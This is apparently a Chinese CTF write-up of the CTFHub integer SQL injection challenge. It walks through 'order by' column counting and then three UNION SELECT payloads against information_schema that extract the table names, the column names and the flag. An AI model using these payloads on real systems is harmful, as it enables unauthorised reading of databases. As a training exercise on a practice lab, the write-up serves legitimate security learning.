CTFHub-web(SQL整数型注入)

上题
CTFHub-web(SQL整数型注入)_第1张图片
按照提示输入1
CTFHub-web(SQL整数型注入)_第2张图片
尝试知道有几个字段,先传入1 order by 2,回显正常
CTFHub-web(SQL整数型注入)_第3张图片
然后1 order by 3,根据回显可得知只有两个字段
CTFHub-web(SQL整数型注入)_第4张图片
找注入点
CTFHub-web(SQL整数型注入)_第5张图片
得知1,2均为注入点
CTFHub-web(SQL整数型注入)_第6张图片
知道了当前数据库名,便可查询出表名

0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

CTFHub-web(SQL整数型注入)_第7张图片
flag必然在名为flag的表里面,查询字段

0 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

CTFHub-web(SQL整数型注入)_第8张图片
查询flag字段拿到flag

0 union select 1,flag from sqli.flag

CTFHub-web(SQL整数型注入)_第9张图片

你可能感兴趣的:(ctf-web)